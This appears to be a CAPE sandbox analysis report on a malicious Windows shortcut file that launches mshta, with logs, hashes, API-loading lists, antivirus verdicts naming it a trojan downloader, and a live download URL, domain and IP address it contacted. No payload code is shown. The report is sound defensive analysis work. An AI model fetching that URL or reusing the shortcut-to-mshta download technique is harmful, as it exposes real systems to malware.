2020-05-23 00:14:20,093 [root] INFO: b'C:\\NduTvp\\CAPE\\5152_50264255920142222552020|5152|0;?C:\\Windows\\System32\\cmd.exe;?C:\\Windows\\System32\\cmd.exe;?'
2020-05-23 00:14:20,093 [root] INFO: cape
2020-05-23 00:14:20,093 [root] INFO: ('dump_file', 'C:\\NduTvp\\CAPE\\5152_50264255920142222552020', b'0;?C:\\Windows\\System32\\cmd.exe;?C:\\Windows\\System32\\cmd.exe;?', ['5152'], 'procdump')
2020-05-23 00:14:20,125 [root] INFO: ('dump_file', 'C:\\NduTvp\\CAPE\\5152_50264255920142222552020', '', False, 'files')
2020-05-23 00:14:20,125 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x49e00.
2020-05-23 00:14:20,140 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 5152
2020-05-23 00:14:20,140 [lib.api.process] INFO: Termination confirmed for process 5152
2020-05-23 00:14:20,140 [root] INFO: Terminate event set for process 5152.
2020-05-23 00:14:20,140 [lib.api.process] INFO: Terminate event set for process 5120
2020-05-23 00:14:20,140 [root] DEBUG: Terminate Event: Attempting to dump process 5120
2020-05-23 00:14:20,140 [root] DEBUG: DoProcessDump: Dumping Imagebase at 0x00CD0000.
2020-05-23 00:14:20,140 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-05-23 00:14:20,140 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00CD0000.
2020-05-23 00:14:20,156 [root] DEBUG: DumpProcess: Module entry point VA is 0x00001576.
2020-05-23 00:14:20,156 [root] INFO: b'C:\\NduTvp\\CAPE\\5120_101841296420142222552020|5120|0;?C:\\Windows\\System32\\mshta.exe;?C:\\Windows\\System32\\mshta.exe;?'
2020-05-23 00:14:20,156 [root] INFO: cape
2020-05-23 00:14:20,156 [root] INFO: ('dump_file', 'C:\\NduTvp\\CAPE\\5120_101841296420142222552020', b'0;?C:\\Windows\\System32\\mshta.exe;?C:\\Windows\\System32\\mshta.exe;?', ['5120'], 'procdump')
2020-05-23 00:14:20,171 [root] INFO: ('dump_file', 'C:\\NduTvp\\CAPE\\5120_101841296420142222552020', '', False, 'files')
2020-05-23 00:14:20,171 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x3400.
2020-05-23 00:14:20,171 [lib.api.process] INFO: Termination confirmed for process 5120
2020-05-23 00:14:20,171 [root] INFO: Terminate event set for process 5120.
2020-05-23 00:14:20,171 [root] INFO: Created shutdown mutex.
2020-05-23 00:14:20,171 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 5120
2020-05-23 00:14:20,171 [root] INFO: ('dump_file', 'C:\\Users\\Rebecca\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat', '', False, 'files')
2020-05-23 00:14:21,171 [root] INFO: Shutting down package.
2020-05-23 00:14:21,171 [root] INFO: Stopping auxiliary modules.
2020-05-23 00:14:21,281 [lib.common.results] WARNING: File C:\NduTvp\bin\procmon.xml doesn't exist anymore
2020-05-23 00:14:21,281 [root] INFO: Finishing auxiliary modules.
2020-05-23 00:14:21,281 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-05-23 00:14:21,281 [root] WARNING: Folder at path "C:\NduTvp\debugger" does not exist, skip.
2020-05-23 00:14:21,281 [root] INFO: Analysis completed.

Machine

Name Label Manager Started On Shutdown On
win7_4 win7_4 KVM 2020-05-23 00:22:31 2020-05-23 00:26:43

File Details

File Name file
File Size 2195 bytes
File Type MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=1, Archive, ctime=Mon Jul 13 23:58:06 2009, mtime=Mon Jul 13 23:58:06 2009, atime=Tue Jul 14 01:39:21 2009, length=43520, window=hide
MD5 0d928d04631084261f5a25868ea96af9
SHA1 53dc22573ef451b171ea8fd58d4909fec5502a62
SHA256 85e811256057167f1b01c1440ea534b92465b5efb7ab39a6c54748f7b9504532
SHA512 b7f3e363045a03b5d114ec9bb045285061ba8534a513e59120e78fce494cf9c9a27a32433fe5b788d2e21d7c67e98f171b644bedee812bbc898637a2bff0d21f
CRC32 75587C7F
Ssdeep 24:8k7ppQcGSxA0OV+/T6ahw8hO4o0c18euaoMVZ0KXQaR3+bCGO+/TDQA8PbQA8Pm:8k7/CxGBTHo1cKXv3AvO9U+
Yara
  • EXE_in_LNK - Identifies executable artefacts in shortcut (LNK) files. - Author: @bartblaze
  • Download_in_LNK - Identifies download artefacts in shortcut (LNK) files. - Author: @bartblaze
Download Download ZIP Resubmit sample

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Guard pages use detected - possible anti-debugging.
Dynamic (imported) function loading detected
DynamicLoader: LINKINFO.dll/IsValidLinkInfo
DynamicLoader: PROPSYS.dll/
DynamicLoader: PROPSYS.dll/PropVariantToGUID
DynamicLoader: PROPSYS.dll/PSGetNameFromPropertyKey
DynamicLoader: PROPSYS.dll/PSStringFromPropertyKey
DynamicLoader: PROPSYS.dll/InitVariantFromBuffer
DynamicLoader: OLEAUT32.dll/
DynamicLoader: PROPSYS.dll/PSLookupPropertyHandlerCLSID
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: PROPSYS.dll/PSCreatePropertyStoreFromObject
DynamicLoader: OLEAUT32.dll/
DynamicLoader: PROPSYS.dll/PropVariantToStringAlloc
DynamicLoader: ole32.dll/CoTaskMemRealloc
DynamicLoader: ole32.dll/CLSIDFromString
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SHELL32.dll/
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoAllowSetForegroundWindow
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: Secur32.dll/GetUserNameExW
DynamicLoader: api-ms-win-downlevel-shlwapi-l1-1-0.dll/PathCreateFromUrlW
DynamicLoader: SHELL32.dll/SHGetFolderPathW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertStringSidToSidW
DynamicLoader: ADVAPI32.dll/SaferGetPolicyInformation
DynamicLoader: sfc.dll/SfcIsFileProtected
DynamicLoader: ole32.dll/OleUninitialize
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: KERNELBASE.dll/SetThreadStackGuarantee
DynamicLoader: KERNELBASE.dll/SetThreadStackGuarantee
DynamicLoader: KERNELBASE.dll/SetThreadStackGuarantee
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/UnregisterTraceGuids
DynamicLoader: OLEAUT32.dll/
DynamicLoader: CRYPTBASE.DLL/SystemFunction036
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: kernel32.dll/RegisterApplicationRestart
DynamicLoader: mshtml.dll/RunHTMLApplication
DynamicLoader: ole32.dll/OleInitialize
DynamicLoader: SHLWAPI.dll/PathRemoveArgsW
DynamicLoader: urlmon.dll/CreateURLMonikerEx
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoCreateInstance
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoInitializeEx
DynamicLoader: OLEAUT32.dll/
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/IUnknown_QueryService
DynamicLoader: SHLWAPI.dll/
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemFree
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: shell32.dll/SHCreateAssociationRegistration
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetTokenInformation
DynamicLoader: Secur32.dll/GetUserNameExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthorityCount
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetSidSubAuthority
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCloseKey
DynamicLoader: shell32.dll/SHGetKnownFolderPath
DynamicLoader: shell32.dll/SHGetKnownFolderPath
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/CopySid
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertSidToStringSidW
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventRegister
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueA
DynamicLoader: iertutil.dll/
DynamicLoader: iertutil.dll/
DynamicLoader: iertutil.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExA
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemAlloc
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: winhttp.dll/WinHttpCreateProxyResolver
DynamicLoader: iertutil.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventActivityIdControl
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExW
DynamicLoader: WS2_32.dll/
DynamicLoader: IPHLPAPI.DLL/GetBestInterfaceEx
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: IPHLPAPI.DLL/NotifyIpInterfaceChange
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/SHGetValueA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegSetValueExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegDeleteValueW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegDeleteValueW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegDeleteValueW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegDeleteValueW
DynamicLoader: IPHLPAPI.DLL/NotifyUnicastIpAddressChange
DynamicLoader: urlmon.dll/CoInternetGetSession
DynamicLoader: urlmon.dll/
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/SHStrDupW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: DNSAPI.dll/DnsGetProxyInformation
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoInitializeEx
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventWrite
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoCreateInstance
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: USER32.dll/RegisterTouchHitTestingWindow
DynamicLoader: OLEAUT32.dll/
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager
DynamicLoader: urlmon.dll/CoInternetCreateZoneManager
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: WS2_32.dll/GetAddrInfoExW
DynamicLoader: OLEACC.DLL/LresultFromObject
DynamicLoader: USER32.dll/GetGUIThreadInfo
DynamicLoader: USER32.dll/GetAccCursorInfo
DynamicLoader: USER32.dll/GetCursorInfo
DynamicLoader: USER32.dll/GetWindowInfo
DynamicLoader: USER32.dll/GetTitleBarInfo
DynamicLoader: USER32.dll/GetScrollBarInfo
DynamicLoader: USER32.dll/GetComboBoxInfo
DynamicLoader: USER32.dll/GetAncestor
DynamicLoader: USER32.dll/RealChildWindowFromPoint
DynamicLoader: USER32.dll/RealGetWindowClassW
DynamicLoader: USER32.dll/GetAltTabInfoW
DynamicLoader: USER32.dll/GetListBoxInfo
DynamicLoader: USER32.dll/GetMenuBarInfo
DynamicLoader: USER32.dll/SendInput
DynamicLoader: USER32.dll/BlockInput
DynamicLoader: USER32.dll/LogicalToPhysicalPoint
DynamicLoader: USER32.dll/PhysicalToLogicalPoint
DynamicLoader: USER32.dll/WindowFromPhysicalPoint
DynamicLoader: USER32.dll/GetPhysicalCursorPos
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/VirtualAllocEx
DynamicLoader: kernel32.dll/VirtualFreeEx
DynamicLoader: ntdll.dll/NtQueryInformationProcess
DynamicLoader: ntdll.dll/NtAllocateVirtualMemory
DynamicLoader: ntdll.dll/NtFreeVirtualMemory
DynamicLoader: OLEAUT32.dll/DllGetClassObject
DynamicLoader: OLEAUT32.dll/DllCanUnloadNow
DynamicLoader: SXS.DLL/SxsOleAut32MapIIDToProxyStubCLSID
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEACC.DLL/ObjectFromLresult
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/StringFromIID
DynamicLoader: ole32.dll/RegisterDragDrop
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoSetProxyBlanket
DynamicLoader: ole32.dll/ObjectStublessClient10
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegEnumKeyExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoWaitForMultipleHandles
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: d2d1.dll/
DynamicLoader: DWrite.dll/DWriteCreateFactory
DynamicLoader: dxgi.dll/CreateDXGIFactory1
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromGdiDisplayName
DynamicLoader: GDI32.dll/D3DKMTCloseAdapter
DynamicLoader: GDI32.dll/D3DKMTQueryAdapterInfo
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromDeviceName
DynamicLoader: setupapi.dll/SetupDiGetClassDevsW
DynamicLoader: setupapi.dll/SetupDiEnumDeviceInterfaces
DynamicLoader: setupapi.dll/SetupDiGetDeviceInterfaceDetailW
DynamicLoader: setupapi.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: setupapi.dll/SetupDiGetDevicePropertyW
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: setupapi.dll/SetupDiGetClassDevsW
DynamicLoader: setupapi.dll/SetupDiEnumDeviceInterfaces
DynamicLoader: setupapi.dll/SetupDiGetDeviceInterfaceDetailW
DynamicLoader: setupapi.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: setupapi.dll/SetupDiGetDevicePropertyW
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromGdiDisplayName
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromDeviceName
DynamicLoader: GDI32.dll/D3DKMTCloseAdapter
DynamicLoader: GDI32.dll/D3DKMTQueryAdapterInfo
DynamicLoader: d3d11.dll/D3D11CreateDevice
DynamicLoader: dxgi.dll/CompatValue
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromGdiDisplayName
DynamicLoader: GDI32.dll/D3DKMTCloseAdapter
DynamicLoader: GDI32.dll/D3DKMTQueryAdapterInfo
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromDeviceName
DynamicLoader: setupapi.dll/SetupDiGetClassDevsW
DynamicLoader: setupapi.dll/SetupDiEnumDeviceInterfaces
DynamicLoader: setupapi.dll/SetupDiGetDeviceInterfaceDetailW
DynamicLoader: setupapi.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: setupapi.dll/SetupDiGetDevicePropertyW
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: setupapi.dll/SetupDiGetClassDevsW
DynamicLoader: setupapi.dll/SetupDiEnumDeviceInterfaces
DynamicLoader: setupapi.dll/SetupDiGetDeviceInterfaceDetailW
DynamicLoader: setupapi.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: setupapi.dll/SetupDiGetDevicePropertyW
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromGdiDisplayName
DynamicLoader: GDI32.dll/D3DKMTOpenAdapterFromDeviceName
DynamicLoader: GDI32.dll/D3DKMTCloseAdapter
DynamicLoader: GDI32.dll/D3DKMTQueryAdapterInfo
DynamicLoader: D3D10Warp.dll/D3DKMTGetThunkVersion
DynamicLoader: D3D10Warp.dll/D3DKMTOpenAdapterFromGdiDisplayName
DynamicLoader: D3D10Warp.dll/D3DKMTOpenAdapterFromDeviceName
DynamicLoader: D3D10Warp.dll/D3DKMTGetDisplayModeList
DynamicLoader: D3D10Warp.dll/D3DKMTSetVidPnSourceOwner
DynamicLoader: D3D10Warp.dll/D3DKMTSetDisplayMode
DynamicLoader: D3D10Warp.dll/D3DKMTCloseAdapter
DynamicLoader: D3D10Warp.dll/D3DKMTSetGammaRamp
DynamicLoader: D3D10Warp.dll/D3DKMTGetDeviceState
DynamicLoader: D3D10Warp.dll/D3DKMTQueryAdapterInfo
DynamicLoader: D3D10Warp.dll/D3DKMTWaitForVerticalBlankEvent
DynamicLoader: GDI32.dll/D3DKMTCreateDCFromMemory
DynamicLoader: GDI32.dll/D3DKMTDestroyDCFromMemory
DynamicLoader: GDI32.dll/D3DKMTCheckVidPnExclusiveOwnership
DynamicLoader: GDI32.dll/D3DKMTCheckMonitorPowerState
DynamicLoader: GDI32.dll/D3DKMTCheckSharedResourceAccess
DynamicLoader: D3D10Warp.dll/D3DKMTSetQueuedLimit
DynamicLoader: D3D10Warp.dll/D3DKMTGetMultisampleMethodList
DynamicLoader: D3D10Warp.dll/D3DKMTQueryAdapterInfo
DynamicLoader: D3D10Warp.dll/D3DKMTSetDisplayPrivateDriverFormat
DynamicLoader: D3D10Warp.dll/D3DKMTDestroySynchronizationObject
DynamicLoader: D3D10Warp.dll/D3DKMTCreateSynchronizationObject
DynamicLoader: D3D10Warp.dll/D3DKMTDestroyContext
DynamicLoader: D3D10Warp.dll/D3DKMTCreateContext
DynamicLoader: D3D10Warp.dll/D3DKMTGetContextSchedulingPriority
DynamicLoader: D3D10Warp.dll/D3DKMTSetContextSchedulingPriority
DynamicLoader: D3D10Warp.dll/D3DKMTPresent
DynamicLoader: D3D10Warp.dll/D3DKMTDestroyDevice
DynamicLoader: D3D10Warp.dll/D3DKMTCreateDevice
DynamicLoader: D3D10Warp.dll/D3DKMTQueryAllocationResidency
DynamicLoader: D3D10Warp.dll/D3DKMTSetAllocationPriority
DynamicLoader: D3D10Warp.dll/D3DKMTDestroyAllocation
DynamicLoader: D3D10Warp.dll/D3DKMTOpenResource
DynamicLoader: D3D10Warp.dll/D3DKMTQueryResourceInfo
DynamicLoader: D3D10Warp.dll/D3DKMTCreateAllocation
DynamicLoader: D3D10Warp.dll/D3DKMTGetDeviceState
DynamicLoader: D3D10Warp.dll/D3DKMTSetDisplayMode
DynamicLoader: D3D10Warp.dll/D3DKMTSignalSynchronizationObject
DynamicLoader: D3D10Warp.dll/D3DKMTWaitForSynchronizationObject
DynamicLoader: D3D10Warp.dll/D3DKMTEscape
DynamicLoader: D3D10Warp.dll/D3DKMTUnlock
DynamicLoader: D3D10Warp.dll/D3DKMTLock
DynamicLoader: D3D10Warp.dll/D3DKMTRender
DynamicLoader: D3D10Warp.dll/OpenAdapter10_2
DynamicLoader: D3D10Warp.dll/
DynamicLoader: D3D10Warp.dll/
DynamicLoader: D3D10Warp.dll/
DynamicLoader: D3D10Warp.dll/
DynamicLoader: D3D10Warp.dll/
DynamicLoader: D3D10Warp.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: urlmon.dll/
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: USER32.dll/IsWindowRedirectedForPrint
DynamicLoader: d2d1.dll/
DynamicLoader: DWrite.dll/DWriteCreateFactory
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: OLEAUT32.dll/
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
DynamicLoader: USER32.dll/GetCurrentInputMessageSource
Performs HTTP requests potentially not found in PCAP.
url: www.d01fa.net:80//images/D817583E/16364/11542/9f9d51bf/b0bdc66
A HTTP/S link was seen in a script or command line
Queries or connects to DNS-Over-HTTPS/DNS-Over-TLS domain or IP address
ip: 1.1.1.1
Queries or connects to DNS-Over-HTTPS/DNS-Over-TLS domain or IP address
ip: 1.1.1.1
A script process initiated network activity
request: /images/d817583e/16364/11542/9f9d51bf/b0bdc66
File has been identified by 26 Antiviruses on VirusTotal as malicious
MicroWorld-eScan: Heur.BZC.YAX.Nioc.1.0443ACBC
McAfee: LNK/Agent-FSDJ!0D928D046310
Cyren: LNK/Trojan.MQII-5
Symantec: Trojan.Gen.MBT
TrendMicro-HouseCall: TROJ_FRS.VSNTD720
Avast: Other:Malware-gen [Trj]
Kaspersky: HEUR:Trojan.WinLNK.Agent.gen
BitDefender: Heur.BZC.YAX.Nioc.1.0443ACBC
AegisLab: Trojan.WinLNK.Acbc.4!c
Rising: Downloader.Mshta/LNK!1.BADA (CLASSIC)
Ad-Aware: Heur.BZC.YAX.Nioc.1.0443ACBC
Emsisoft: Heur.BZC.YAX.Nioc.1.0443ACBC (B)
DrWeb: Trojan.DownLoader33.28040
TrendMicro: TROJ_FRS.VSNTD720
McAfee-GW-Edition: LNK/Agent-FSDJ!0D928D046310
FireEye: Heur.BZC.YAX.Nioc.1.0443ACBC
Sophos: Troj/DownLnk-X
F-Prot: LNK/Trojan.MQII-5
Microsoft: Trojan:Win32/Casdet!rfn
ZoneAlarm: HEUR:Trojan.WinLNK.Agent.gen
GData: Heur.BZC.YAX.Nioc.1.0443ACBC
ALYac: Trojan.Downloader.LnK.Gen
MAX: malware (ai score=98)
Fortinet: LNK/DownLnk.X!tr
AVG: Other:Malware-gen [Trj]
Qihoo-360: Generic/Trojan.066
Attempts to modify proxy settings

Screenshots


Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
Y 1.1.1.1 [VT] Australia

DNS

Name Response Post-Analysis Lookup
www.d01fa.net [VT] 5.181.156.24 [VT]

Summary

C:\Users\Rebecca\AppData\Local\Temp\file.lnk
C:\
C:\Windows
C:\Windows\System32
C:\Windows\System32\cftmo.exe
C:\Windows\System32\mshta.exe
C:\Windows\System32\msHta.Exe:Zone.Identifier
C:\Users
C:\Users\Rebecca
C:\Users\Rebecca\AppData
C:\Users\Rebecca\AppData\Local
C:\Users\Rebecca\AppData\Local\Temp
C:\Users\Rebecca\AppData\Local\Temp\file.lnk:Zone.Identifier
C:\Windows\System32\cmd.exe
C:\Windows\winsxs\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms
\Device\KsecDD
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\Rebecca\AppData\Local\Microsoft\Windows\Temporary Internet Files
C:\Users\Rebecca\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
\??\Nsi
\Device\RasAcd
C:\Windows\System32\en-US\mshtml.dll.mui
\Device\NetBT_Tcpip_{8C26D1B6-C485-43DB-8C6E-9EBF79977CC0}
\Device\NetBT_Tcpip_{D33A5283-24A7-4033-8928-D28491165639}
\Device\NetBT_Tcpip6_{8C26D1B6-C485-43DB-8C6E-9EBF79977CC0}
